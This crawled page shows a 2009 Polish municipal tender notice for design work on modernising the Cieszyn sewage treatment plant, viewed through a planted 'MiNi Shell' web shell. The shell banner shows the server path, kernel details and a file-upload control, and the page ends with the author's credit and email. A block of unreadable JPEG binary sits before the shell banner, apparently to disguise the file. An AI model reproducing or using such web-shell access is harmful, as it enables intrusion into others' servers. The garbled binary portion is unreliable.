JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/218240-N-2009.html

<p class="kh_header"><b>Cieszyn: Opracowanie dokumentacji projektowo-kosztorysowej dla zadania p.n. Modernizacja Oczyszczalni Ścieków w Cieszynie</b><br>
<b>Numer ogłoszenia: 218240 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cieszyn, w imieniu której działa Burmistrz Miasta Cieszyna , Rynek 1/11, 12, 43-400 Cieszyn, woj. śląskie, tel. 033 4794200, 4794350, faks 033 4794303, 4794361.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej dla zadania p.n. Modernizacja Oczyszczalni Ścieków w Cieszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej oraz specyfikacji technicznych wykonania i odbioru robót remontowo - budowlanych i montażowych dla zadania Modernizacja Oczyszczalni Ścieków w Cieszynie na podstawie Projektu koncepcyjnego modernizacji systemu napowietrzania komór denitryfikacji i reaeracji oraz modernizacji pompowni głównej opracowanej przez BIOSYSTEM PIB z Wrocławia w 2005 r. Dokumentacja powinna zawierać również projekt techniczny nowego dodatkowego urządzenia do odwadniania osadu w budynku pras wraz z niezbędnymi instalacjami. 


Wytyczne zamawiającego do opracowania dokumentacji projektowo-kosztorysowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz innych wymaganych w SIWZ opracowań:

Modernizacja pompowni głównej
wymiana pomp w pompowni głównej, polegającego na wykonaniu równoległego układu podającego, zasilanego niezależnie przez dwustronny zespół sześciu pomp o wydajności 400-650 m3 na h, w układzie równoległym 3+3 z każdej strony pompowni, zasilanych niezależnie, każda ze stron musi mieć możliwość zasilania pomp poprzez falownik, pompy w wersji suchego zainstalowania o zwiększonej odporności na ścieranie (piaskownik za pompownią),
usytuowanie pomp na stanowiskach powinno być takie aby z każdego zbiornika czerpalnego pompy pobierały ścieki,
pompy w pompowni ścieków własnych powinny zapewniać przepływ ok. 150 m3 h, tak aby w okresie deszczowym pracowała jedna pompa (druga w rezerwie na stanowisku),
rezygnacja z rurociągu wewnątrz pompowni, łączącego zbiorniki czerpalne po dwóch stronach pompowni (wg koncepcji),
należy przewidzieć wymianę armatury, napędów do zasuw oraz przepustnic,
wymiana rurociągów wewnątrz pompowni oraz przejść szczelnych rurociągów przez ściany
należy zachować 4 rurociągi tłocznych na piaskownik z odpowiednim podłączeniem do pomp, czyszczenie rurociągów tłocznych,
remont budowlany pompowni głównej obejmujący naprawę elewacji zewnętrznej i wewnętrznej pompowni, remont zbiorników czerpalnych oraz pokryw zbiorników,
wymiana instalacji elektrycznej pompowni, układów elektrycznych pomp, sterowania, wymiana sond, 2 falowników (do każdej strony pompowni musi być przyporządkowany falownik z możliwością przełożenia na inną pompę). Układ elektryczny winny być podobny do aktualnie pracującego: umożliwiający pracę jednej strony pompowni, jak i pracę dwustronną (naprzemienną),
układ sterowania powinien być zbliżony do aktualnego: umożliwiający sterowanie pompami, przepustnicami, zasuwami ze sterowni pompowni oraz sterowania z centralnej dyspozytorni;

Modernizacja systemu napowietrzania komór denitryfikacji i komór reaeracji
remont budowlany komór denitryfikacji, reaeracji, remont pomostów, kanałów łączących komory, remont zastawek w kanałach, czyszczenie komór,
wymiana systemu napowietrzania na system napowietrzania dyfuzorami w komorach denitryfikacji i reaeracji,
wymiana mieszadeł wraz z konstrukcjami nośnymi w komorach denitryfikacji i reaeracji,
należy przewidzieć możliwość okresowego opróżniania zbiorników poprzez wypompowanie ścieków,
budowa stacji napowietrzania wraz 6-cioma dmuchawami do napowietrzania komór denitryfikacji i reaeracji wraz z systemem sterowania podłączonym do centralnego systemu sterowania,
zapewnić dostęp dla celów eksploatacyjnych do stacji dmuchaw.

Nowe dodatkowe urządzenie do odwadniania osadu
dostawa nowego urządzenia do odwadniania osadu - prasy sitowo taśmowej wraz z automatyczną stacją przygotowania polimeru, rurociągami, pompą podającą osad, sterowaniem,
nowa prasa powinna mieć parametry i konstrukcje zbliżoną do używanej obecnie prasy,
montaż nowego dodatkowego urządzenia do odwadniania osadu wraz z niezbędnymi zmianami w zakresie podłączenia technologicznych instalacji elektrycznej i sterowania,
modernizacja systemu odprowadzającego osad na zewnątrz budynku pras z uwzględnieniem obu urządzeń odwadniających,
wymiana napędów do zasuw do spuszczania osadu z zagęszczaczy.
Oczyszczalnia będzie wyposażona, w nową dodatkową prasę do odwadniania osadów, o parametrach przedstawionych w poniższej tabeli:
Parametry techniczne prasy odwadniania osadu
Typ osaduOsad komunalny stabilizowany tlenowo
po zagęszczeniu grawitacyjnym
Wydajność osadu90 - 120 m3 na d
Produkcja osadu3600 - 4000 kg SM na d roboczą
Stężenie osadu na wejściu do prasy40 g na l ?5
Czas pracy8 h na d -5 dni w tygodniu
Wydajność na wejściu do prasy16 m3 na h ?2
Średnia produkcja osadu 100 % SM640 kg SM na h
Stężenie osadu na wyjściu z prasyCo najmniej 18%?1*
Wydajność osadu na wyjściu 3,5 m3 na h
Konsumpcja polimeru4 kg ?1 na T.SM
Wydajność polimeru o stężeniu 2 g na l1025 l h
Zużycie wody płuczącej12 m3 dobę przy ciśnieniu 8 bar
 - Stopień odwodnienia osadu w % uzależniony jest od stosunku substancji organicznej i mineralnej w osadzie nadmiernym oraz od jakości flokulacji.

Parametry dostarczonej wody: 15 m3 h, 2 bar, maksymalna zawartość zawiesiny: 50 g m3. Do płukania taśmy prasy można zastosować ścieki oczyszczone, po spełnieniu ww warunków.
Konstrukcja urządzenia - taśmowa prasa filtracyjna, flokulator, zbiornik przygotowania polimeru, platforma montażowa, śruby itp. są wykonane ze stali nierdzewnej. Wszystkie połączenia hydrauliczne są wykonywane z PVC - PN16. Dodatkowo podczas montażu zostaną wykonane prace podłączeniowe.
Urządzenia wchodzące w zestaw obiektu przeróbki osadu:
Prasa taśmowa o szerokości taśmy: 2 m (dwie taśmy) wraz z regulacją prędkości obrotów przez dwa przemienniki częstotliwości - 1 szt.
Dozownik obrotowy - 1 szt.
Flokulator obrotowy wraz z regulacją prędkości obrotów przez przemienniki częstotliwości - 1 szt.
Pompa osadu o wydajności 5 - 23 m3 h, wydajność regulowana przez przekładnię bezstopniową pracującą w kąpieli olejowej - 1 szt.
Pompa wody płuczącej o wydajności 12 m3 h przy ciśnieniu 8 bar - 1 szt.
Automatyczna stacja przygotowania polimeru o wydajności produkcyjnej max.: 1600 l h - 1 szt.
Miksery obrotowe o małej prędkości - 3 szt.
Dozownik polimeru wraz z regulacją wydajności przez 1 przemiennik elektroniczny - 1 szt.
Pompa polimeru o wydajności 300- - 1500 l h. Wydajność może być regulowana przez przekładnię bezstopniową pracującą w kąpieli olejowej - 1 szt.
Podłączenie wody do zbiorników polimeru zawiera: filtr 220 m (1 szt.) oraz komplet sond kontroli poziomu polimeru min, max i awarii z elektronicznym sygnalizatorem poziomu (1 kpl).
Kompresor powietrza o wydajności 100 l - 1 szt.
Panel filtracyjny 450 um - 1 szt.
Szafa sterownicza ciągu technologicznego odwadniania osadu - 1 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy: 
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.
a)wykonali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną dokumentację projektowo - kosztorysową obejmującą modernizację lub i rozbudowę lub budowę nowej oczyszczalni ścieków o przepustowości co najmniej 5000 m3 dobę. Wartość wskazanej w ofercie dokumentacji nie może być niższa niż 100.000 zł brutto,
b)dysponują lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, posiadających uprawnienia budowlane do projektowania w specjalnościach:
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - dwie osoby (projektant + sprawdzający).  Wymaga się aby te osoby posiadały co najmniej 5 letnie doświadczenie w projektowaniu, które będzie liczone od dnia uzyskania uprawnień,
konstrukcyjno-budowlanej - jedna osoba,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - jedna osoba, 
zgodnie z art. 12, art. 12a oraz art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający wymaga, aby osoby, od których wymagane są uprawnienia legitymowały się aktualnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. 
a)posiadają środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 100.000 zł,
b)są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności - wysokość ubezpieczenia 100.000 zł,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy Pzp).

Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie dokumentów i oświadczeń załączonych do oferty, które zostały wyszczególnione w pkt 5 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem wykonawcy z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. Zamawiający odrzuci ofertę, jeżeli wystąpi przynajmniej jedna przesłanka unormowana w art. 89 ust. 1 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)oświadczenie, na formularzu oferty, że:
wykonawca posiada środki finansowe w kwocie nie mniejszej niż 100.000 zł lub zdolność kredytową na kwotę nie mniejszą niż 100.000 zł w banku lub spółdzielczej kasie oszczędnościowo-kredytowej,
wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100.000 zł,
wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu,
w przypadku wykonawcy będącego: osobą fizyczną - tej osoby fizycznej; spółką jawną - wspólnika; spółką partnerską - partnera lub członka zarządu; spółką komandytową - komplementariusza; spółka komandytowo-akcyjną - komplementariusza; osobą prawną - urzędującego członka organu zarządzającego, nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przekupstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego,
wobec podmiotu zbiorowego sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary,
d)wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - wg załącznika nr 4,
e)wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - wg załącznika nr 3,
f)pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt e), wykonawca wskazał osoby, którymi będzie dysponował, 
g)dokumenty stwierdzające, że osoby, które będą pełnić samodzielne funkcje techniczne posiadają wymagane uprawnienia tj.  należy dołączyć dokumenty potwierdzające posiadanie wymaganych uprawnień oraz zaświadczenie o przynależności do właściwej Izby samorządu zawodowego  z określonym w nim terminem ważności,
h)oświadczenie potwierdzające, że wykonawca spełnia warunki określone w art. 22 ust. 1 u.P.z.p. - wg załącznika nr 2 do SIWZ.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej: 
I.	zamiast dokumentów, o których mowa w pkt a - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości -  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt I, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

Brak jakiegokolwiek z wyżej wymienionych dokumentów lub oświadczeń, lub złożenie dokumentu w niewłaściwej formie (np. nie poświadczone przez wykonawcę za zgodność z oryginałem odpisy  lub kopie) lub zawierającego błędy, spowoduje wykluczenie wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.cieszyn.bip-gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Cieszynie, Wydział Inwestycji Miejskich, ul. Kochanowskiego 14, pokój nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2009 godzina 10:00, miejsce: Urząd Miejski w Cieszynie, Rynek 1, 43 - 400 Cieszyn - biuro podawcze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com